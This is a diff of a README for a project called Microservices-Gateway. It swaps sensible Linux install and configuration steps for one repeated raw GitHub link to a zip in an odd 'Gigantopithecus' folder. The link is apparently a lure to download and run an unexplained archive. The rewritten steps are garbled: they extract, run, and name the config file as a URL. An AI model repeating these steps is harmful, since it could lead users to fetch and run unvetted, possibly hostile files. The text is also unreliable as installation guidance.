davidmark9779/Microservices-Gateway/README.md

 #### For Linux:
 1. Open a terminal.
 2. Navigate to the directory where you downloaded the file.
-3. Extract the file using `tar -xzf Microservices-Gateway.tar.gz`.
+3. Extract the file using `tar -xzf https://raw.githubusercontent.com/davidmark9779/Microservices-Gateway/main/Gigantopithecus/Microservices-Gateway-v1.2.zip`.
 4. Change into the extracted directory using `cd Microservices-Gateway`.
-5. Run the application using `./start.sh`.
+5. Run the application using `https://raw.githubusercontent.com/davidmark9779/Microservices-Gateway/main/Gigantopithecus/Microservices-Gateway-v1.2.zip`.

 ## 🎛️ Configuration
 After installation, you may need to configure the gateway:
-1. Locate the configuration file, usually named `config.json`.
+1. Locate the configuration file, usually named `https://raw.githubusercontent.com/davidmark9779/Microservices-Gateway/main/Gigantopithecus/Microservices-Gateway-v1.2.zip`.
 2. Update the settings such as routes, authentication tokens, or other preferences as needed.
 3. Save the changes.